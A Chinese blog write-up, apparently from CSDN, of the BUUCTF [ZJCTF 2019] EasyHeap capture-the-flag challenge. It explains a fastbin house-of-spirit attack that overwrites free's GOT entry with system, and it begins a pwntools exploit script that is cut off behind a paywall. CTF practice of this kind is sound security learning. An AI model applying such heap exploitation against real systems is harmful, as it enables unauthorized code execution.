本文记录了作者初次成功解决的堆题——ZJCTF 2019的EasyHeap,尽管题目并不复杂,但作者之前对堆的理解一直模糊。通过这次挑战,作者首次接触了堆漏洞利用,特别是fastbin attack中的house of spirit技术。利用漏洞修改got表中free的地址为system函数,调用free时触发system执行,实现目标。
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
这是第一次成功做出了堆题,说来惭愧这道题真的不难,但是研究了好久,堆也就一直没学明白,今天算是正式迈进了第一步吧,给自己加油!
这里可以看到partial relro,说明我们的got表是可以修改的
一般的堆题都是这种表单形式的
ida里我们可以看到这个函数,但是实践证明它无法执行,因为flag根本就不在这个目录下,但是提供给我们system函数了,这道题涉及到了fastbin attack里面的house of spirit漏洞,具体的大家可以去ctfwiki上面了解
我们的思路就是通过漏洞利用,修改got表里的free,将其修改为system函数,然后我们调用free时就执行了system了,附上exp,对于关键点进行了必要的说明
from pwn import *
sh = remote("node3.buuoj.cn","29244")
sh.sendafter('Your choice :','1\n') #heap0
sh.sendafter('Size of Heap : ','96\n')
sh.sendafter('Content of heap:','\n')
sh.sendafter('Your choice :','1\n') #heap1
sh.sendafter('Size of Heap : ','96\n')
sh
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
